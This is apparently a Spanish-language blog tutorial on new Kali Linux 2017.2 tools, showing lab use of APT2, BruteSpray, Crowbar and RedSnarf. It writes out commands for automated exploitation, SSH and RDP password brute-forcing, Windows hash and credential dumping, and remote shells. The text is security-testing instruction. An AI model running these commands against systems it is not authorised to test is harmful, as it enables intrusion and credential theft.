Advertisement

header ads

LAS NUEVAS HERRAMIENTAS DE KALI LINUX 2017.2

Hace un tiempo KALI LINUX a actualizado a kali linux 2017.2 con un lanzamientos de algunas nuevas herramientas, hoy vamos a ver que tiene de bueno esas herramientas.



Nota: Las herramientas no se instalan automáticamente, pero están disponibles en los repositorios. Por lo tanto, para usarlos, tendrá que ‘apt-install’ los que desea.

Nuevas Herramientas

  • APT2
  • B374K
  • BloodHound
  • BruteSpray
  • ChangeMe
  • CrackMapExec
  • CredDump7
  • Crowbar
  • Dbeaver
  • hURL
  • Phishery
  • RedSnarf
  • Secure-Socket-Funneling
  • SSH-Audit
  • Tinfoleak
  • Wgetpaste

APT2 – AUTOMATIZAR PENTESTING

La herramienta se instala con el siguiente comando:
apt-get install apt2
Me imagino que sabrás algo de pentesting intenta leer un post anterior que escrito.
Como sabemos debemos que sacar la IP de algún servidor antes de atacar o usar la herramienta.
arp-scan -l
Ahora vamos a usar msfconsole pero vamos a ver la configuración para conectarse la herramienta al msfconsole.
cd /usr/share/apt2
cat default.cfg
Eso lo podes modificar en caso de haber cambiado la contraseña de msfconsole, pero ahora ejecutamos msfconsole
msfconsole -q
load msgrpc User=msf Pass=msfpass ServerPort=55552
No cierre la terminar y abra otra
Al obtener la IP colocamos el siguiente comando.
apt2 -v -s 1 -b --target 192.168.1.2
Dejamos cargando en caso de haber encontrado una vulnerabilidad o conectado el msfconsole vamos a usar lo siguiente
sessions
sessions -i 1
Listo hemos iniciado automáticamente con solo hacer un comando y no buscar la vulnerabilidad manualmente.
Ahora vamos a ir donde se guarda toda la información.
cd /root/.apt2/
Tenemos logs proofs reports tmp que son importante y donde se guarda info.
 Mas info HERE!

BruteSpray – Herramienta Brute Force de servicio

Brute Spray toma la salida nmap GNMAP/XML y automáticamente bruta-obliga a los servicios con credenciales predeterminadas usando Medusa.
INSTALACIÓN:
apt-get install brutespray
Ahora para que hagas tu test tenes que tener un archivo en formato .xml con el cual lo podes hacer con un nmap, recuerda que la herramienta te puede funcionar para smtp, smtp, ssh, telnet, mysql.
Es casi parecido a hydra, ahora te voy a mostrar la función:
nmap -sT -A --top-ports=20 192.168.1.9 -oG top-cread.xml



Lo que hacemos es hacer un escaneo TOP PORT para analizar los puertos principales y en este server tenemos el ssh.
Listo después de haber tenido xml usemos brutespray
brutespray --file top-cread.xml -i
Te recomiendo que escribas y no copies y peques porque no te lanzará el mismo resultado y recuerda que el diccionario esta por default en KALI para hacer el test y agregado la contraseña. En nuestro caso sabemos el usuario.


Enter services you want to brute - default all (ssh,ftp,etc): ssh
Enter the number of parallel threads (default is 2): 5
Enter the number of parallel hosts to scan per service (default is 1): 10
Would you like to specify a wordlist? (y/n): y
Enter a passlist you would like to use: /usr/share/set/src/fasttrack/wordlist.txt
Would to specify a single username or password (y/n): y
Enter a username: creadpag

El programa comienza a correr y buscar la contraseña en mi caso lo encontró fácilmente para el test.
LISTO! recuerda que es una herramienta para fuerza bruta ya sea para la contraseña y como el usuario y con un diccionario podes hacerlo.

Crowbar: Herramienta de fuerza bruta

¿Qué es Crowbar

Crowbar (formalmente conocido como Levye) es una herramienta de fuerza bruta que se puede utilizar durante las pruebas de penetración. Se desarrolló a la fuerza bruta algunos protocolos de una manera diferente de acuerdo con otras herramientas de fuerza bruta popular. Como ejemplo, mientras que la mayoría de las herramientas de forzar brutales usan el nombre de usuario y la contraseña para la fuerza bruta de SSH, Crowbar usa claves SSH. Esto permite que las claves privadas que se han obtenido durante las pruebas de penetración, se utilicen para atacar a otros servidores SSH.
INSTALACIÓN:
apt-get install crowbar
Para usarlo podemos hacer lo siguiente recuerda podes hacer fuerza bruta rdp, sshkey.
crowbar -b rdp -s 192.168.1.9/24 -U user.txt -C pass.txt -d
Por desgracia del destino esta herramienta no me puso feliz y intente de todas las maneras correr mi diccionario y no tuve buenos resultados y eso que esta con la seguridad baja.
crowbar -b rdp -s 192.168.1.9/24 -u creadpag -c creadpag

Redsnarf

¿Qué es Redsnarf?

Redsnarf es una herramienta de pen-testing / red-teaming de Ed Williams para recuperar hashes y credenciales de estaciones de trabajo, servidores y controladores de dominio de Windows.
Redsnarf parece una herramienta muy útil que tiene un montón de características. Se dirige a equipos con Windows y puede extraer información del sistema, recuperar contraseñas, habilitar el acceso remoto, ejecutar shells remotas y mucho más.
Lo corrí contra una prueba local de Windows 7 sistema de escritorio, y sólo se ejecuta cuando UAC fue totalmente deshabilitado en el sistema. Por lo tanto, esto parece ser una gran herramienta de post-explotación.
INSTALACIÓN:
apt-get install redsnarf
Aprender a como se usa, aunque tenes que tener el usuario y la contraseña no me llega a satisfacer.
Descargamos información:
redsnarf -H ip=192.168.1.8 -u creadpag -p creadpag548

la información incluyendo contraseñas y acciones se muestra y se guarda en el directorio de registro.
Shell de mando a distancia
Redsnarf tiene la capacidad de crear varios tipos diferentes shell.
redsnarf -H ip=192.168.1.8 -u creadpag -p creadpag548 -d CREADPAG-PC -uD y
Ejecutar el comando anterior se conectará al sistema de destino y mostrará los shells disponibles, como se muestra a continuación:
 Mimikatz sigilo
La opción Mimikatz Stealth es bastante interesante. Crea un servidor web en el sistema de destino, extrae las credencias del sistema y las descarga en texto sin formato:
redsnarf -H ip=192.168.1.8 -u creadpag -p creadpag548 -d CREADPAG-PC -hR y
Explotación:
Cada vez que ejecuta un comando, el programa le proporciona un directorio que contiene los registros del programa. Los registros contienen una gran cantidad de información importante obtenida del sistema:
cd /tmp
cd 192.168.1.8


 

Conclusión:

En este artículo hemos discutido algunas de las nuevas herramientas incluidas con Kali Linux. Kali Linux es la plataforma de prueba de seguridad de computadoras más rica en características disponible y continúa creciendo a medida que nuevas herramientas y capacidades se agregan constantemente.
No te olvides en compartir para seguir escribiendo sobre más. GRACIAS!

Publicar un comentario

0 Comentarios